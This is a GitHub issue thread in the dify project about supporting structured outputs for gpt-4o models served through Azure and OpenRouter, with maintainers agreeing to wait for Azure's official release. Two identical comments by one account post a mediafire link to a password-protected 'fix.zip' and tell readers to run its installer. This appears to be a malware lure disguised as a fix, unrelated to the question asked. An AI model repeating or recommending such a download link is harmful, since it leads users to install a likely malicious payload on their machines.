### ISSUE TITLE
Any plan on supporting other model vendors(Azure OpenRouter) structured outputs?

### ISSUE THREAD

**Issue by liaopen123** [langgenius/dify#7636]
### Self Checks

- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### 1. Is this request related to a challenge you're experiencing? Tell me about your story.

> > OpenAI Structured Outputs Support: Now supporting OpenAI's Structured Outputs by @hjlarry in #7258.

I am currently using models from model vendors such as AZure and OpenRouter, but when I use the gpt-4o-mini-2024-07-18 and gpt-4o-2024-08-06 models from these vendors, I cannot use the new structured output feature.
I see that Dify's 7.0.1 version already supports openai. Is there any plan to support gpt-4o-mini-2024-07-18 and gpt-4o-2024-08-06 from other vendors?

### 3. Can you help us with this feature?

- [ ] I am interested in contributing to this feature.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by crazywoola** [comment]
@hjlarry Can you take a look at this.

**Comment by hjlarry** [comment]
> @hjlarry Can you take a look at this.

I can add the  structured output for Azure models,  but I haven't got an Azure key for test :)

**Comment by jasonchanhku** [comment]
@hjlarry Azure OpenAI gpt-4o-2024-08-06 structured output has not been officially released yet, but should be soon. Only available via playground testing 😄 Azure OpenAI gpt-4o-mini also not supported json_schema yet per my understanding.

**Comment by liaopen123** [comment]
> e OpenAI gpt-4o-2024-08-06 structured output has not been officially released yet, but should be soon. Only available via playground testing 😄 Azure OpenAI gpt-4o-mini also not supported json_schema yet per my understanding.Azure OpenAI gpt-4o-2024-08-06 结构化输出尚未正式发布，但应该很快就会发布。仅可通过游乐场测试使用😄 根据我的理解，Azure OpenAI gpt-4o-mini 还不支持 json_schema。

In one case, like our company, we connect to the OpenAI capabilities provided by Microsoft Azure and call the Azure API interface, but the models can be various. So we can also call some models that support structured output

**Comment by hjlarry** [comment]
> @hjlarry Azure OpenAI gpt-4o-2024-08-06 structured output has not been officially released yet, but should be soon. Only available via playground testing 😄 Azure OpenAI gpt-4o-mini also not supported json_schema yet per my understanding.

thanks,  we should wait to merge the PR until the official version released

**Comment by jasonchanhku** [comment]
noted, thanks your all your awesome works on Dify! and looking forward to the Azure OpenAI gpt-4o-2024-08-06 Structured Output merge 😄
